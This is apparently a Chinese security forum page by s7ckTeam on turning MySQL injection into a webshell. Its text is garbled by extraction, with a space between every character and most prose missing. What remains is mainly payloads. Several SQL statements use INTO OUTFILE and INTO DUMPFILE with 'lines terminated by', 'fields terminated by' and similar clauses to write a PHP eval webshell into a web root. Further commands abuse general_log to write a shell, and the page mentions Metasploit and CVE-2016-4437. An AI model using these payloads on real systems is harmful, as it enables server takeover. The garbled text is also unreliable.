[7594] 2021-05-07_MYSQL注入GETSHELL

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2021-05-07_MYSQL注入GETSHELL M Y S Q L   G E T S H E L L F 1 2 s e c   2 0 2 1 - 0 5 - 0 7   M Y S Q L   G E T S H E L L m y s q l s h e l l 0 x 0 1   1 2 3 4 5 1 . m y s q l r o o t 2 . s e c u r e _ f i l e _ p r i v = d : w w w s e c u r e _ f i l e _ p r i v = d : 3 . 4 . g p c p h p 5 . c r e a t e , i n s e r t , s e l e c t ( r o o t . . ) 0 x 0 2   s h e l l 1 s h o w   g l o b a l   v a r i a b l e s   l i k e   ' % s e c u r e _ f i l e _ p r i v % ' ;   # p h p s t u d y 5 . 7 . 2 6 n u l l 5 . 5 . 2 9 5 . 5 . 2 9 U N I O N   S E L E C T   .
1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = - 1   u n i o n   s e l e c t   1 , 2 , ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > '   i n t o   o u t f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p ' ; l i n e s   t e r m i n a t e d   b y 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   i n t o   o u t f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p '   l i n e s   t e r m i n a t e d   b y   ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > ' ; l i n e s   s t a r t i n g   b y 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   i n t o   o u t f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p '   l i n e s   s t a r t i n g   b y   ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > ' ; f i e l d s   t e r m i n a t e d   b y 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   i n t o   o u t f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p '   f i e l d s   t e r m i n a t e d   b y   ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > ' ;
C O L U M N S   t e r m i n a t e d   b y 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   i n t o   o u t f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p '   C O L U M N S   t e r m i n a t e d   b y   ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > ' ; 0 x 0 3   o u t f i l e d u m p f i l e o u t f i l e d u m p f i l e u d f d u m p f i l e o u t f i l e d u m p f i l e 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = - 1   u n i o n   s e l e c t   ' ' , ' ' , ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > '   i n t o   d u m p f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p ' ; 1 s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   u n i o n   s e l e c t   1 , 2 , ' < ? p h p   e v a l ( $ _ P O S T [ ' p a s s ' ] ) ;   ? > '   i n t o   d u m p f i l e   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p ' ; 1 2 u n i o n   s e l e c t 0 x 0 4   g e t s h e l l 1 2 3 s h o w   v a r i a b l e s   l i k e   ' % g e n e r a l % ' ; s e t   g l o b a l   g e n e r a l _ l o g   =   o n ;     # s e t   g l o b a l   g e n e r a l _ l o g _ f i l e   =   ' D : p h p s t u d y _ p r o W W W s h e l l . p h p ' ;     #
w e b s h e l l 0 x 0 5   3 . 5 ( v u l h u b : C V E - 2 0 1 6 - 4 4 3 7 ) p h p M e t a s p l o i t - w i n d o w s

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则